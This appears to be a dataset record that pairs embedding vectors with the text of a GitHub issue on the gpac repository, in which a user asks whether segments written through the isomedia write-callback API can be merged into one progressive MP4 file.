-0.0010224336292594671, 0.003988390322774649, -0.010016744025051594, -0.002623510779812932, 0.022348063066601753, 0.006911030504852533, 0.010147511027753353, 0.006368347909301519, -0.018359672278165817, -0.004472227767109871, 0.009650597348809242, 0.013743600808084011, -0.015940485522150993, 0.006165659055113792, -0.016672778874635696, 0.0016125192632898688, -0.0032691725064069033, 0.005332020111382008, 0.009441370144486427, 0.00003894912515534088, 0.005103178322315216, -0.0006248205900192261, -0.02147192507982254, 0.0035078220535069704, -0.012180936522781849, 0.009650597348809242, -0.0017571802018210292, -0.02633645385503769, -0.01371744740754366, 0.0011564696906134486, -0.014946656301617622, 0.006227773614227772, 0.014724352397024632, -0.006293157115578651, -0.004900489468127489, 0.012350933626294136, -0.006629881449043751, -0.015862025320529938, -0.017313536256551743, -0.0039524296298623085, 0.020805012434720993, -0.0012177667813375592, 0.020373482257127762, 0.005956432316452265, -0.03747779130935669, -0.002845814684405923, 0.010827499441802502, 0.01318130362778902, -0.0030305227264761925, -0.011330951936542988, 0.00953944493085146, -0.020451942458748817, 0.009709442034363747, -0.009186374954879284, -0.007466789800673723, 0.012148244306445122, 0.01387436781078577, 0.010069050826132298, 0.013325146399438381, 0.0042172325775027275, 0.012246320024132729, 0.007859090343117714, 0.013043997809290886, 0.008401772938668728, -0.027931809425354004, 0.008957532234489918, 0.017627377063035965, 0.01767968386411667, -0.010265201330184937, -0.017483534291386604, 0.001295409514568746, -0.024296488612890244, -0.010526735335588455, 0.01920965686440468, 0.025813385844230652, -0.00568182161077857, 0.03653627261519432, 0.012265934608876705, 0.005982585716992617, 0.015038193203508854, 0.018490439280867577, -0.043963830918073654, 0.029213324189186096, -0.0045637646690011024, -0.015587413683533669, -0.026179533451795578, -0.0016501147765666246, 0.013357838615775108, -0.012259396724402905, 0.0202296394854784, 0.002522166585549712, -0.002783700358122587, 0.03452245891094208, 0.0020040026865899563, 0.001047769794240594, 0.01492050290107727, -0.00968982744961977, 0.019994258880615234, 0.024061109870672226, 0.021824995055794716, 0.00975521095097065, 0.0021772687323391438, -0.0019451575353741646, -0.00734909949824214, 0.019039660692214966, 0.006401039659976959, -0.00574720511212945, -0.004259731620550156, 0.005972777958959341, 0.011873634532094002, 0.004988756962120533, -0.009500214830040932, -0.00934329442679882, 0.008238314650952816, -0.0005324664525687695, -0.0029945620335638523, -0.0019141004886478186, 0.013743600808084011, -0.00030668923864141107, -0.01726122945547104, 0.0039458912797272205, 0.00045482360292226076, -0.004684723913669586, 0.014789735898375511, 0.0008189277141354978, 0.014724352397024632, -0.021916531026363373, -0.008820227347314358, -0.014332052320241928, 0.0027166823856532574, 0.00421396316960454, 0.0015021847793832421, -0.013266301713883877, -0.011337489821016788, -0.018071984872221947, 0.008545616641640663, 0.012553622014820576, -0.01107595581561327, -0.007041797507554293, 0.0016787200001999736, -0.00021433511574286968, -0.014018211513757706, -0.0010003667557612062, -0.014593585394322872, -0.0045441496185958385, 0.0012488238280639052, -0.02396957203745842, -0.010611733421683311, 0.02079193666577339, 0.023093434050679207, 0.0018617936875671148, -0.017588147893548012, 0.0229888204485178, 0.006845647003501654, 0.014528201892971992, 0.016829699277877808, 0.028768716380000114, -0.0006628247210755944, 0.012520930729806423, 0.0021086162887513638, 0.004161656368523836, 0.013743600808084011, -0.002368515357375145, -0.010232510045170784, 0.003968775272369385, 0.02118423767387867, 0.007532173302024603, 0.019144274294376373, -0.006378155201673508, -0.010049436241388321, -0.01371744740754366, 0.007342561148107052, 0.01225285790860653, 0.026859520003199577, 0.004318576771765947, -0.01590125449001789, 0.005675283260643482, -0.024087263271212578, 0.016097404062747955, 0.011814788915216923, 0.01994195207953453, -0.006221235264092684, 0.0024028418119996786, -0.014148978516459465, 0.0010845479555428028, 0.024296488612890244, -0.02008579485118389, 0.048566825687885284, -0.01796737127006054, -0.003818393452093005, 0.015391264110803604, -0.0058877794072031975, 0.019628111273050308, -0.0022263063583523035, 0.0027379319071769714, -0.004504919517785311, -0.01094518881291151, -0.0011793539160862565, 0.008892148733139038, 0.0007421021582558751, -0.009290987625718117, 0.019615033641457558, 0.02952716499567032, 0.010069050826132298, 0.006067583803087473, 0.007689093705266714, -0.010010206140577793, -0.02158961445093155, 0.007741400506347418, -0.0404331237077713, -0.009729057550430298, 0.006852185353636742, -0.012037092819809914, 0.0037922400515526533, 0.008996762335300446, -0.009029454551637173, 0.00920598953962326, -0.020386559888720512, 0.022779593244194984, 0.01101057231426239, -0.026127226650714874, -0.014083595015108585, -0.022125758230686188, 0.017666608095169067, -0.0061035449616611, 0.00685872370377183, 0.014815889298915863, 0.004377421922981739, -0.00022128211276140064, -0.024218028411269188, -0.026297222822904587, -0.003972044680267572, 0.008964071050286293, -0.0023832267615944147, -0.013952828012406826, 0.012135167606174946, -0.024034956470131874, -0.004429728724062443, -0.006374886259436607, 0.001789871952496469, 0.03470553457736969, -0.0043676141649484634, 0.004207424819469452, 0.011344028636813164, -0.039360836148262024, -0.00829715933650732, 0.015064346604049206, -0.00305177248083055, 0.002250825287774205, -0.0058747027069330215, -0.01660739630460739, 0.02372111566364765, 0.001033875741995871, 0.01894812285900116, -0.029344091191887856, 0.0012120456667616963, 0.013495143502950668, -0.004576841369271278, -0.014018211513757706, -0.00035409224801696837, -0.018019678071141243, 0.00989905372262001, -0.01728738285601139, -0.016489705070853233, 0.00863061472773552, -0.009389063343405724, -0.0009210893185809255, 0.004540880676358938, -0.0024240913335233927, 0.001832371111959219, -0.007532173302024603, -0.01142902672290802, 0.0035012837033718824, -0.02050424925982952, 0.03334555774927139, 0.02410033904016018, -0.012017478235065937, 0.023668808862566948, 0.014998963102698326, 0.004694531671702862, -0.0001907357800519094, -0.012566698715090752, -0.002893217606469989, -0.008996762335300446, 0.018843509256839752, 0.015352034009993076, -0.001043683267198503, -0.0022344794124364853, 0.013848214410245419, -0.009925207123160362, -0.038942381739616394, -0.003166193375363946, -0.012880539521574974, -0.005933547858148813, -0.017195846885442734, -0.02088347263634205, 0.009709442034363747, 0.0035045528784394264, 0.009317141026258469, 0.0015193478902801871, -0.02730412781238556, -0.001532424590550363, 0.013357838615775108, 0.006610266864299774, 0.016947390511631966, -0.022060375660657883, -0.012396701611578465, 0.012507854029536247, 0.029344091191887856, -0.02496340125799179, -0.009447908028960228, -0.003426092676818371, 0.003092637052759528, -0.004387229215353727, 0.00578316580504179, 0.0008258746820501983, 0.004325115121901035, 0.013482066802680492, -0.011174031533300877, -0.022112682461738586, 0.00913406815379858, 0.01965426467359066, -0.0016043463256210089, 0.004629148170351982, -0.008794073946774006, -0.019601957872509956, 0.027356434613466263, -0.006819493602961302, -0.014135901816189289, 0.010716347023844719, -0.008774458430707455, -0.01485511939972639, 0.010526735335588455, -0.00620162021368742, -0.026859520003199577, 0.023786498233675957, -0.0014335321029648185, -0.03177635744214058, -0.02636260725557804, 0.02199499122798443, 0.015129730105400085, -0.0012267569545656443, 0.0024126493372023106, 0.005936817266047001, -0.016960466280579567, 0.03823624178767204, 0.01897427625954151, -0.005312405060976744, -0.004923373460769653, 0.023354968056082726, -0.0031335018575191498, -0.007970242761075497, 0.005698167718946934, 0.00787216704338789, -0.012664773501455784, 0.008892148733139038, 0.015077423304319382, 0.002878506202250719, -0.005109716672450304, 0.0014621373265981674, 0.01910504326224327, 0.005842010956257582, -0.014528201892971992, 0.015299727208912373, 0.04249924048781395, 0.030416380614042282, -0.00983367022126913, -0.018843509256839752, -0.0036026278976351023, -0.008133701048791409, 0.008552155457437038, 0.0027085093315690756, -0.002924274653196335, -0.004864528775215149, 0.0016648260643705726, -0.005871433764696121, 0.02398264966905117, -0.010297893546521664, 0.011664407327771187, -0.011062879115343094, 0.0045637646690011024, -0.0167120099067688, 0.015822794288396835, 0.03834085538983345, -0.02733028121292591, 0.001028971979394555, -0.010611733421683311, 0.015495877712965012, -0.014789735898375511, 0.012507854029536247, 0.00983367022126913, -0.0024535139091312885, -0.0066887266002595425, -0.028193343430757523, 0.004439536016434431, 0.018634282052516937, 0.014658968895673752, -0.014619738794863224, 0.007839475758373737, 0.0008426291751675308, -0.007891782559454441, 0.01387436781078577, -0.00032242212910205126, -0.010709809139370918, -0.013338223099708557, -0.0042303092777729034, -0.005884510464966297, -0.0046128020621836185, 0.0019386193016543984, 0.0285856444388628, 0.014436664991080761, -0.0028114882297813892, 0.009591751731932163, 0.009912130422890186, -0.018608128651976585, 0.010860190726816654, 0.015692027285695076, 0.006525268312543631, -0.012167859822511673, -0.005132600665092468, -0.0034914761781692505, 0.012233243323862553, -0.005466056056320667, 0.0035405138041824102, 0.003373785875737667, 0.007800245191901922, 0.027225667610764503, -0.014279745519161224, 0.01577048748731613, 0.013691294007003307, 0.011605561710894108, -0.01587510108947754, -0.0024894748348742723, 0.0012169494293630123, -0.008048702031373978, -0.00155122228898108, 0.020530402660369873, 0.008807150647044182, 0.003638588823378086, 0.0278795026242733, 0.025564927607774734, 0.001583096687681973, 0.017248153686523438, 0.012004401534795761, 0.016672778874635696, 0.006100275553762913, 0.015574336983263493, -0.0029259093571454287, -0.009415216743946075, -0.012239781208336353, 0.002559761982411146, -0.017470456659793854, -0.0030795603524893522, 0.006110083311796188, 0.01741814985871315, 0.03512398898601532, -0.008682921528816223, -0.00863061472773552, -0.024728020653128624, 0.00676064845174551, 0.009264834225177765, -0.03635319694876671, 0.010709809139370918, -0.003396670101210475, 0.00032773453858681023, 0.009212527424097061, -0.007767553441226482, 0.016829699277877808, 0.01073596253991127, -0.01685585267841816, 0.017208924517035484, 0.0202296394854784, -0.006678919307887554, 0.01966734044253826, -0.0040962728671729565, -0.024728020653128624, -0.010199817828834057, 0.001321562915109098, -0.008859457448124886, -0.0031841739546507597, -0.010239047929644585, -0.003547052154317498, -0.009552521631121635, -0.014672045595943928, 0.013083227910101414, -0.010879806242883205, -0.01601894572377205, -0.017797375097870827, 0.0060022007673978806, -0.021275773644447327, -0.010304431430995464, -0.00976174883544445, 0.016202017664909363, -0.007754477206617594, 0.007924473844468594, -0.012331318110227585, 0.0006186908576637506, -0.003285518381744623, 0.015862025320529938, 0.0023930342867970467, -0.010225971229374409, 0.009663674049079418, -0.009022915735840797, -0.027513355016708374, -0.027905656024813652, 0.007231409195810556, 0.009356371127068996, -0.0005815040203742683, 0.007159487809985876, -0.01869966648519039, -0.016476629301905632, 0.015352034009993076, 0.00017122289864346385, -0.0014768486144021153, 0.014802812598645687, 0.00558047741651535, -0.012010939419269562, 0.003668011398985982, -0.0122070899233222, 0.02199499122798443, -0.01002982072532177, -0.0019778492860496044, 0.010363276116549969, -0.010860190726816654, 0.02884717658162117, 0.03065176121890545, -0.008643691428005695, -0.007244485896080732, -0.0012112284312024713, -0.008879072032868862, 0.01025212462991476, -0.016842776909470558, -0.01540434081107378, -0.004243385978043079, 0.004665108863264322, 0.008964071050286293, 0.003991659730672836, 0.025198781862854958, -0.014175131916999817, -0.015391264110803604, 0.014750505797564983, -0.011755944229662418, 0.006708341650664806, -0.00659065181389451, 0.016751239076256752, 0.01897427625954151, -0.009735595434904099, -0.013344761915504932, 0.00027174994465894997, 0.013508220203220844, -0.009925207123160362, 0.014332052320241928, 0.004455882124602795, 0.008303698152303696, -0.006652765907347202, -0.019863491877913475, 0.0008434464689344168, 0.0015062711900100112, 0.001557760639116168, -0.0094021400436759, -0.00457030301913619, 0.003192346775904298, 0.02355111762881279, 0.0376608669757843, -0.006819493602961302, 0.02871641144156456, 0.006440269760787487, 0.008421388454735279, 0.01645047590136528, 0.005855087656527758, -0.002790238708257675, 0.012004401534795761, -0.018228905275464058, -0.037843938916921616, 0.009519830346107483, 0.012180936522781849, 0.01852966845035553, 0.012821693904697895, 0.025342624634504318, 0.005727590061724186, -0.006306233815848827, 0.0004679003031924367, 0.009617905132472515, 0.004393767565488815, 0.015142806805670261, -0.027984116226434708, 0.0032511919271200895, 0.010042897425591946, -0.012148244306445122, 0.03690241649746895, -0.012730157002806664, 0.014685122296214104, -0.015443570911884308, -0.020595787093043327, -0.011056341230869293, 0.00898368563503027, 0.03805316612124443, -0.012664773501455784, 0.005655668210238218, -0.011023649014532566, 0.014528201892971992, -0.009042531251907349, -0.01824198290705681, -0.013344761915504932, -0.0010902689537033439, 0.0023162085562944412, -0.0001977849315153435, -0.036876264959573746, -0.016058174893260002, 0.008820227347314358, -0.008558693341910839, -0.005891048815101385, -0.01135710533708334, -0.01642432250082493, 0.004985488019883633, -0.004086465574800968, 0.03229942172765732, 0.010376352816820145, -0.005969509016722441, 0.03637935221195221, 0.013364376500248909, 0.015090500004589558, -0.005822395905852318, 0.0024813017807900906, 0.025408007204532623, -0.007970242761075497, 0.01100403442978859, 0.008055240847170353, -0.0115009481087327, 0.014724352397024632, -0.0014964636648073792, -0.014750505797564983, -0.002809853758662939, -0.005982585716992617, -0.007035259157419205, 0.004681454971432686, 0.000641166465356946, -0.004312038421630859, -0.012233243323862553, 0.010847114026546478, -0.0005770089337602258, -0.03614396974444389, 0.00914060603827238, 0.014410511590540409, -0.0020317905582487583, 0.002347265835851431, 0.011769020929932594, 0.013338223099708557, -0.00473376177251339, -0.0237080380320549, -0.01282823272049427, -0.007832936942577362, -0.00015283380344044417, -0.006283349357545376, 0.003896853420883417, 0.0160058680921793, 0.018163522705435753, 0.011690560728311539, 0.015692027285695076, -0.010820960626006126, -0.025473391637206078, 0.008539078757166862, 0.018425054848194122, 0.001547135878354311, -0.010657502338290215, 0.01643739826977253, 0.005201253108680248, -0.0063421945087611675, -0.018085062503814697, 0.009225604124367237, 0.006116621661931276, 0.022688057273626328, 0.006897953804582357, -0.00018695580365601927, 0.0021854417864233255, -0.006276811007410288, 0.002371784532442689, -0.00865023024380207, 0.005184907466173172, -0.02353804185986519, 0.007460251450538635, -0.00013424039934761822, 0.008467156440019608, -0.010265201330184937, -0.011167492717504501, -0.006996029056608677, 0.009199450723826885, 0.011167492717504501, -0.011213261634111404, -0.005403941962867975, 0.009611367247998714, -0.01080134604126215, -0.004207424819469452, 0.0014392531011253595, -0.0008973878575488925, -0.011402873322367668, 0.011259029619395733, -0.03182866424322128, 0.0090686846524477, -0.004573572427034378, 0.009591751731932163, 0.020961932837963104, -0.017052004113793373, -0.0052764443680644035, 0.004040697123855352, 0.001579010277055204, -0.009722518734633923, 0.01701277308166027, -0.003684357274323702, -0.005443172063678503, 0.0022998626809567213, -0.012128629721701145, -0.022374216467142105, 0.005518362857401371, -0.013730524107813835, 0.00009950543608283624, 0.014083595015108585, 0.01741814985871315, 0.017352767288684845, -0.0008777728071436286, 0.00023517609224654734, 0.03122713416814804, -0.015456647612154484, -0.023093434050679207, 0.03528090938925743, 0.01323360949754715, 0.008584846742451191, 0.014894349500536919, 0.013142073526978493, -0.008741767145693302, 0.03692857176065445, -0.01456743199378252, -0.0063356561586260796, -0.003399939276278019, 0.0042793466709554195, -0.006767186801880598, -0.019850414246320724, -0.014750505797564983, -0.018045831471681595, 0.016123557463288307, -0.00662661250680685, 0.03705933690071106, -0.015064346604049206, -0.0101148197427392, 0.011219799518585205, 0.007107181008905172, -0.0007980866939760745, 0.024453409016132355, 0.01669893227517605, -0.0002619424485601485, 0.006443538703024387, 0.0068718004040420055, 0.025329547002911568, 0.003681088099256158, 0.012298626825213432, -0.002616972429677844, 0.015195113606750965, -0.004929911810904741, 0.01839890144765377, -0.017235077917575836, -0.028088729828596115, 0.021942684426903725, 0.00532548176124692, 0.026127226650714874, 0.01643739826977253, 0.004119157325476408, -0.0032789800316095352, 0.017640454694628716, 0.02092270366847515, 0.0022426522336900234, -0.0011417585192248225, -0.021668074652552605, -0.0061591207049787045, -0.014515125192701817, -0.021550385281443596, -0.00962444394826889, 0.001277429168112576, 0.032116349786520004, -0.005067217163741589, 0.013952828012406826, 0.001296226866543293, 0.007126796059310436, -0.008774458430707455, 0.00010369405936216936, -0.014410511590540409, -0.005551054608076811, 0.0083560049533844, 0.009513291530311108, -0.0032560958061367273, 0.011023649014532566, -0.005528170615434647, 0.006074122153222561, 0.01841197907924652 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: https://gpac.io/bug-reporting/ If I make isomedia file with ``` file_ptr = gf_isom_open("_gpac_isobmff_redirect", GF_ISOM_OPEN_WRITE, NULL); gf_isom_set_write_callback gf_isom_open_segment gf_isom_close_segment ``` All segment files managed by callback function If I make 10 segments, Is it possible to combine 10 segments to one progressive mp4 using gpac API ??
Do I making all segment files to one progressive mp4 ??
https://api.github.com/repos/gpac/gpac/issues/2737/comments
1
2024-01-23T02:24:29
2024-01-23T10:48:58Z
https://github.com/gpac/gpac/issues/2737
2,095,116,508
2,737
false
This is a GitHub Issue repo:gpac owner:gpac Title : Do I making all segment files to one progressive mp4 ?? Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at https://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: https://gpac.io/bug-reporting/ If I make isomedia file with ``` file_ptr = gf_isom_open("_gpac_isobmff_redirect", GF_ISOM_OPEN_WRITE, NULL); gf_isom_set_write_callback gf_isom_open_segment gf_isom_close_segment ``` All segment files managed by callback function If I make 10 segments, Is it possible to combine 10 segments to one progressive mp4 using gpac API ?? --- end body ---
1,191
[ -0.033875495195388794, 0.043145373463630676, -0.01885082758963108, 0.00021944998297840357, -0.018430883064866066, 0.007531776558607817, -0.018275348469614983, 0.05767233297228813, -0.04877573624253273, 0.06140517070889473, 0.016315609216690063, -0.03306671604514122, 0.021899310871958733, -0.03353331983089447, -0.024372315034270287, -0.013274901546537876, -0.01580234244465828, -0.012240594252943993, 0.006824092473834753, 0.01849309727549553, 0.03608408942818642, -0.020732799544930458, -0.02796517126262188, 0.03300449997186661, 0.00971315335482359, 0.014138120226562023, -0.012598324567079544, 0.016144519671797752, -0.03213350474834442, 0.025196649134159088, 0.007601766847074032, 0.02927166409790516, 0.0029357208404690027, 0.029209449887275696, 0.044918473809957504, -0.00541261350736022, 0.06600899994373322, 0.03919478878378868, -0.013259348459541798, 0.005867553409188986, -0.02314358949661255, -0.009277655743062496, -0.03633294627070427, 0.024387868121266365, -0.001870306907221675, 0.0472203865647316, -0.015024668537080288, 0.023532425984740257, -0.008562195114791393, -0.0016904696822166443, 0.014830250293016434, -0.017155496403574944, -0.009332092478871346, -0.0247922595590353, 0.008608855307102203, -0.032289039343595505, 0.06650671362876892, -0.0423365943133831, 0.002859897445887327, 0.028089597821235657, 0.003437320701777935, 0.004152781330049038, -0.03483981266617775, 0.045105114579200745, 0.019255217164754868, -0.006804650649428368, -0.02620762586593628, 0.029396090656518936, 0.01133849285542965, 0.03018931858241558, 0.010910771787166595, -0.03110697492957115, 0.01626894809305668, -0.007302362471818924, -0.001292883651331067, -0.04638050124049187, 0.06255612522363663, 0.013461543247103691, -0.016144519671797752, 0.01895970106124878, -0.05729904770851135, 0.015172427520155907, -0.0460694283246994, 0.015273524448275566, 0.009588724933564663, 0.004354976583272219, -0.050393298268318176, -0.050486620515584946, 0.014830250293016434, -0.010708576068282127, -0.0006770627805963159, -0.007912836968898773, 0.011773990467190742, -0.010514157824218273, 0.017824295908212662, -0.0011859533842653036, -0.01568569242954254, 0.007920613512396812, -0.047438137233257294, -0.04040795937180519, -0.012302808463573456, 0.017124390229582787, 0.005027664825320244, -0.015117989853024483, 0.02546105906367302, 0.027918510138988495, 0.04709596186876297, -0.01532796211540699, -0.0168288741260767, 0.08759724348783493, 0.001537851057946682, 0.004078902304172516, -0.001975292805582285, -0.01235724613070488, 0.024870026856660843, 0.00752788782119751, -0.04507400840520859, -0.05135761573910713, 0.02804293856024742, -0.002334967255592346, 0.0004512941522989422, -0.023672407492995262, -0.04591389372944832, 0.0024593952111899853, -0.025943217799067497, 0.052726324647665024, -0.04675378277897835, -0.010980762541294098, -0.0019053022842854261, 0.0035734137054532766, -0.03931921720504761, -0.01402146928012371, -0.02572546899318695, -0.022614771500229836, 0.047904741019010544, -0.014838026836514473, -0.018150920048356056, 0.016859980300068855, -0.031915757805109024, 0.017684316262602806, -0.03009599819779396, -0.04718928039073944, 0.06100077927112579, -0.01701551489531994, 0.0071312738582491875, -0.034155458211898804, 0.00028749648481607437, 0.006777432281523943, -0.028540650382637978, -0.016844427213072777, -0.02351687289774418, -0.010996315628290176, -0.005723683629184961, 0.0005944348522461951, -0.0074695623479783535, 0.02054615691304207, 0.00541261350736022, 0.0014814697206020355, -0.008787720464169979, 0.004424967337399721, 0.010988539084792137, -0.024683384224772453, -0.002498278860002756, 0.02118385024368763, -0.012007292360067368, -0.004697153344750404, 0.025849895551800728, 0.031449150294065475, -0.006618008948862553, 0.018244240432977676, -0.0019091905560344458, -0.008725506253540516, 0.0006979627651162446, -0.02275475300848484, -0.026518696919083595, -0.022692538797855377, 0.009822027757763863, 0.027343031018972397, -0.027249710634350777, 0.014161450788378716, -0.021510472521185875, -0.030500389635562897, -0.03424878045916557, 0.00882660411298275, 0.015234640799462795, 0.0017779580084607005, 0.03431099280714989, -0.023641301319003105, 0.020468389615416527, -0.019737375900149345, 0.02766965515911579, 0.03168245404958725, 0.020032892003655434, 0.0008530115592293441, 0.04709596186876297, -0.013974808156490326, -0.013935924507677555, -0.02172822132706642, -0.014853580854833126, -0.013492650352418423, -0.029567180201411247, -0.008795497007668018, -0.024932241067290306, -0.02779408171772957, -0.024667831137776375, 0.010405283421278, -0.00003408400880289264, 0.00487601850181818, 0.010840781033039093, -0.04578946903347969, -0.048091381788253784, -0.04855798929929733, 0.03574191406369209, 0.017699869349598885, -0.006330269388854504, -0.009658715687692165, -0.011198511347174644, -0.011532911099493504, -0.001655474305152893, 0.0017128278268501163, -0.003952530212700367, 0.002226092852652073, -0.0037483905907720327, -0.006128074135631323, -0.0081266975030303, -0.01645559072494507, 0.003657013876363635, -0.025772128254175186, 0.014208110980689526, 0.03611519932746887, 0.026829766109585762, 0.01877306029200554, -0.0024127347860485315, 0.01528907846659422, -0.024823365733027458, 0.013687068596482277, 0.013360445387661457, -0.04802916944026947, 0.015569041483104229, 0.029784929007291794, -0.009884241037070751, 0.02256811037659645, -0.014433636330068111, 0.03763943910598755, 0.027094176039099693, 0.06457807868719101, -0.0020433394238352776, 0.013212687335908413, -0.016315609216690063, 0.022645877674221992, -0.00841443706303835, -0.00471659516915679, 0.008593302220106125, -0.02258366346359253, -0.02768520824611187, 0.016859980300068855, 0.006789097096771002, 0.015296855010092258, -0.044078584760427475, -0.04330090805888176, -0.0009735511266626418, -0.02441897615790367, -0.027171943336725235, -0.022645877674221992, 0.01735769212245941, -0.04015910625457764, -0.016222286969423294, 0.015856780111789703, 0.011027422733604908, 0.011128520593047142, -0.02060837112367153, -0.005124873947352171, -0.007792297285050154, 0.03763943910598755, -0.02172822132706642, 0.007558994926512241, 0.003761999774724245, 0.0019140510121360421, 0.012956054881215096, 0.009627608582377434, -0.03309782221913338, 0.005424278788268566, 0.0018615580629557371, 0.03297339379787445, -0.012139497324824333, -0.006851311307400465, 0.006357488222420216, -0.008204464800655842, -0.04952230304479599, 0.017233263701200485, 0.02060837112367153, 0.01821313425898552, -0.016953300684690475, 0.003808660199865699, 0.028540650382637978, 0.0369550846517086, 0.015677915886044502, 0.0038630974013358355, 0.008811051025986671, 0.033315569162368774, -0.021774882450699806, 0.019581841304898262, 0.025243310257792473, -0.0018343394622206688, -0.04703374579548836, 0.020281746983528137, -0.03555527329444885, -0.012792743742465973, -0.002511888276785612, -0.017762083560228348, 0.05981871485710144, -0.054872702807188034, -0.02434120886027813, 0.029598286375403404, 0.0018732231110334396, 0.03232014551758766, 0.03353331983089447, -0.02443452924489975, -0.03446652740240097, -0.01791761815547943, 0.010902995243668556, 0.021121636033058167, -0.025849895551800728, 0.017886510118842125, -0.01013309694826603, -0.027436351403594017, -0.0026849207933992147, -0.011781767010688782, -0.001581595279276371, 0.03011155128479004, 0.005715906620025635, -0.009363199584186077, 0.03424878045916557, -0.012792743742465973, 0.021945970132946968, -0.023656854405999184, -0.04115452989935875, -0.025227757170796394, 0.010366399772465229, -0.00007102353993104771, 0.025321077555418015, -0.037390582263469696, 0.051793113350868225, -0.005754790268838406, 0.0017303255153819919, -0.002513832412660122, -0.008204464800655842, 0.007916725240647793, 0.031060313805937767, 0.01467471569776535, 0.0009925069753080606, 0.008608855307102203, 0.002031674375757575, 0.01838422194123268, 0.000471222068881616, 0.0024963347241282463, 0.017762083560228348, -0.03269343078136444, 0.010677468962967396, -0.004277209285646677, 0.01737324520945549, -0.03614630550146103, 0.0032487346325069666, 0.022692538797855377, -0.0005521487910300493, 0.0071312738582491875, -0.030547048896551132, -0.023003607988357544, -0.0025779905263334513, 0.005478715989738703, 0.0022047068923711777, 0.01411478966474533, -0.012046176008880138, 0.00634193466976285, -0.03446652740240097, 0.024123460054397583, 0.005054883658885956, -0.010350845754146576, -0.005097655579447746, 0.010677468962967396, -0.03511977568268776, 0.044451866298913956, 0.034964241087436676, -0.03798161819577217, -0.020095106214284897, 0.021899310871958733, 0.010615255683660507, 0.009892018511891365, -0.04298983886837959, -0.028851719573140144, 0.00015869417984504253, 0.004409413784742355, -0.018415329977869987, -0.02417011931538582, -0.06305383890867233, 0.027109729126095772, -0.035244204103946686, 0.01398258563131094, -0.006851311307400465, -0.012738306075334549, 0.03782608360052109, -0.01867973804473877, 0.01903746835887432, 0.04883795231580734, 0.0008617604034952819, 0.01699996180832386, 0.02703196182847023, 0.016502249985933304, 0.03204018622636795, 0.009176557883620262, -0.014386976137757301, -0.035430844873189926, -0.02777852863073349, -0.04896237701177597, 0.03378217667341232, 0.0334399975836277, -0.018881933763623238, 0.0110507532954216, -0.04395415633916855, 0.01886638067662716, 0.004071125295013189, -0.029193896800279617, -0.012691645883023739, -0.009495404548943043, 0.0016807487700134516, 0.017590994015336037, 0.0336577482521534, 0.01505577564239502, 0.032848965376615524, -0.029022807255387306, 0.027731867507100105, -0.039070360362529755, -0.018430883064866066, -0.002152213826775551, 0.018539756536483765, 0.008290008641779423, -0.026456482708454132, -0.03704840689897537, 0.01171177625656128, -0.0026654789689928293, -0.027187496423721313, 0.03194686397910118, 0.04591389372944832, 0.013243794441223145, 0.031060313805937767, -0.023485766723752022, -0.04914902150630951, -0.06899526715278625, 0.04619385674595833, -0.017528779804706573, 0.020732799544930458, 0.04448297619819641, -0.013834827579557896, -0.008748836815357208, 0.0010984650580212474, -0.000036453486245591193, -0.01276941318064928, 0.0038300463929772377, 0.04750034958124161, 0.014122567139565945, 0.011501803994178772, 0.01701551489531994, 0.018710846081376076, 0.02333023212850094, 0.027934063225984573, -0.031915757805109024, -0.020763905718922615, -0.0035073114559054375, 0.017139943316578865, -0.015436836518347263, -0.0149624552577734, 0.01737324520945549, 0.0202350877225399, 0.006964073982089758, -0.020017338916659355, -0.012162826955318451, 0.0013580138329416513, -0.07658537477254868, 0.028105152770876884, -0.03337778523564339, -0.0168288741260767, -0.022521449252963066, -0.0018683626549318433, 0.010926324874162674, -0.040376853197813034, 0.007613432127982378, -0.007279032375663519, -0.017964277416467667, 0.014107013121247292, -0.0021541579626500607, -0.002579934662207961, 0.01138515304774046, -0.010000892914831638, -0.0020899998489767313, 0.012372799217700958, 0.018928594887256622, -0.004771032370626926, 0.00040244648698717356, 0.005700353067368269, -0.015491273254156113, -0.0010518046328797936, 0.001574790570884943, -0.023563534021377563, -0.007084613665938377, 0.03586634248495102, 0.0010663860011845827, -0.026736445724964142, 0.01568569242954254, -0.01371039915829897, 0.006478027440607548, -0.0189441479742527, 0.006925190333276987, -0.01411478966474533, -0.02889838069677353, 0.009666492231190205, -0.02202373929321766, -0.0004160557873547077, -0.001353153376840055, 0.02434120886027813, -0.0017099115066230297, -0.006310827564448118, -0.022241488099098206, -0.013445990160107613, 0.030484836548566818, -0.019115235656499863, 0.007442343980073929, -0.016502249985933304, -0.018275348469614983, 0.05194864794611931, -0.010879664681851864, -0.020686138421297073, -0.0072323717176914215, -0.01661112532019615, 0.027000853791832924, -0.010467496700584888, -0.007088501937687397, -0.00845332071185112, 0.011952855624258518, 0.02026619389653206, -0.01766876131296158, -0.02639426849782467, 0.03574191406369209, -0.05378396064043045, 0.011245171539485455, -0.05742347612977028, 0.004852687940001488, 0.011214064434170723, -0.00024387383018620312, -0.0018586417427286506, 0.0015456278342753649, -0.01234946958720684, -0.02906946837902069, -0.01143181324005127, -0.0002979465061798692, 0.014806919731199741, -0.0028423997573554516, 0.023096928372979164, -0.0007033092551864684, 0.008717729710042477, -0.012046176008880138, 0.010148650966584682, 0.021759329363703728, 0.005012111272662878, -0.01434809248894453, 0.009005469270050526, -0.006804650649428368, -0.010560818016529083, 0.011735106818377972, -0.03994135558605194, 0.0027043626178056, 0.0028851719107478857, -0.02983158826828003, 0.027949616312980652, -0.010413059964776039, -0.005474827717989683, 0.0005142372101545334, 0.018182026222348213, -0.021012762561440468, -0.030422622337937355, -0.004284985829144716, 0.02007955312728882, -0.028027385473251343, 0.0008923813584260643, 